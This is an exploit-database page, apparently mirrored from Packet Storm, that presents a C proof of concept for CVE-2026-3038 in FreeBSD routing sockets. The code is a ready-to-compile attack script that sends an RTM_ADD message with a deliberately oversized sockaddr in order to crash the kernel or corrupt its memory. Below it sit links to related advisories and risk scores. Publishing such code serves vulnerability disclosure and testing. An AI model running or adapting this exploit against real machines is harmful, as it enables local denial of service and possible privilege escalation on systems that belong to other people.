Lucene search
K

๐Ÿ“„ FreeBSD Routing Socket Input Validation

๐Ÿ—“๏ธย 26 Feb 2026ย 00:00:00Reported byย indoushkaTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 173ย Views

Tests FreeBSD routing socket input validation by crafting a route message add with an oversized sockaddr.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-3038
9 Mar 202612:25
โ€“attackerkb
BDU FSTEC
The vulnerability of the rtsock_msg_buffer() function in the operating system kernel of FreeBSD, which allows a hacker to cause a service failure
17 Mar 202600:00
โ€“bdu_fstec
Circl
CVE-2026-3038
25 Feb 202602:05
โ€“circl
CNNVD
FreeBSD ๅฎ‰ๅ…จๆผๆดž
9 Mar 202600:00
โ€“cnnvd
CVE
CVE-2026-3038
9 Mar 202612:25
โ€“cve
Cvelist
CVE-2026-3038 Local DoS and possible privilege escalation via routing sockets
9 Mar 202612:25
โ€“cvelist
EUVD
EUVD-2026-10334
9 Mar 202615:30
โ€“euvd
EUVD
EUVD-2026-10335
9 Mar 202615:30
โ€“euvd
FreeBSD
FreeBSD -- Local DoS and possible privilege escalation via routing sockets
24 Feb 202600:00
โ€“freebsd
FreeBSD Advisory
FreeBSD-SA-26:05.route
24 Feb 202600:00
โ€“freebsd_advisory
Rows per page
=============================================================================================================================================
    | # Title     : FreeBSD Routing Socket Input Validation Analysis โ€“ Oversized sockaddr in RTM_ADD                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.freebsd.org/                                                                                                    |
    =============================================================================================================================================
    
    [+] Summary    :  PoC attempts to test the robustness of the FreeBSD routing socket subsystem by crafting a RTM_ADD message containing an 
                      intentionally oversized sockaddr structure (sa_len greater than the traditional sockaddr_storage limit of 128 bytes).
    				  
                      4 you https://packetstorm.news/files/id/216124/
    
    [+] POC   :  
    
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <net/route.h>
    #include <net/if.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <errno.h>
    
    #define ROUNDUP(a) \
        ((a) > 0 ? (1 + (((a) - 1) | (sizeof(long) - 1))) : sizeof(long))
    
    struct malicious_sockaddr {
        unsigned char  sa_len;    
        unsigned char  sa_family; 
        char           sa_data[254]; 
    };
    
    int main() {
        int s;
        char buf[1500];
        struct rt_msghdr *rtm;
        struct malicious_sockaddr *dst, *gw;
        int l;
    
        printf("[+] FreeBSD CVE-2026-3038 Local DoS PoC\n");
    
        s = socket(PF_ROUTE, SOCK_RAW, AF_UNSPEC);
        if (s < 0) {
            perror("[-] socket(PF_ROUTE) failed");
            return 1;
        }
    
        memset(buf, 0, sizeof(buf));
        rtm = (struct rt_msghdr *)buf;
        rtm->rtm_msglen = 0; 
        rtm->rtm_version = RTM_VERSION;
        rtm->rtm_type = RTM_ADD; 
        rtm->rtm_addrs = RTA_DST | RTA_GATEWAY;
        rtm->rtm_flags = RTF_UP | RTF_GATEWAY | RTF_STATIC;
        rtm->rtm_pid = getpid();
        rtm->rtm_seq = 42;
    
        dst = (struct malicious_sockaddr *)(rtm + 1);
        dst->sa_family = AF_INET;
        dst->sa_len = 180; 
        memset(dst->sa_data, 'A', 170);
    
        int dst_space = ROUNDUP(dst->sa_len);
        gw = (struct malicious_sockaddr *)((char *)dst + dst_space);
        gw->sa_family = AF_INET;
        gw->sa_len = sizeof(struct sockaddr_in);
        ((struct sockaddr_in *)gw)->sin_addr.s_addr = inet_addr("127.0.0.1");
    
        rtm->rtm_msglen = sizeof(struct rt_msghdr) + dst_space + ROUNDUP(gw->sa_len);
    
        printf("[*] Sending packet: msglen=%d, dst->sa_len=%d\n", rtm->rtm_msglen, dst->sa_len);
        printf("[!] Attempting to trigger kernel memory corruption...\n");
    
        if (write(s, buf, rtm->rtm_msglen) < 0) {
    
            fprintf(stderr, "[-] Result: %s\n", strerror(errno));
        } else {
            printf("[+] Packet accepted. If the system is vulnerable, it might crash now.\n");
        }
    
        close(s);
        return 0;
    }
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.17.5
EPSS0.00468
SSVC
173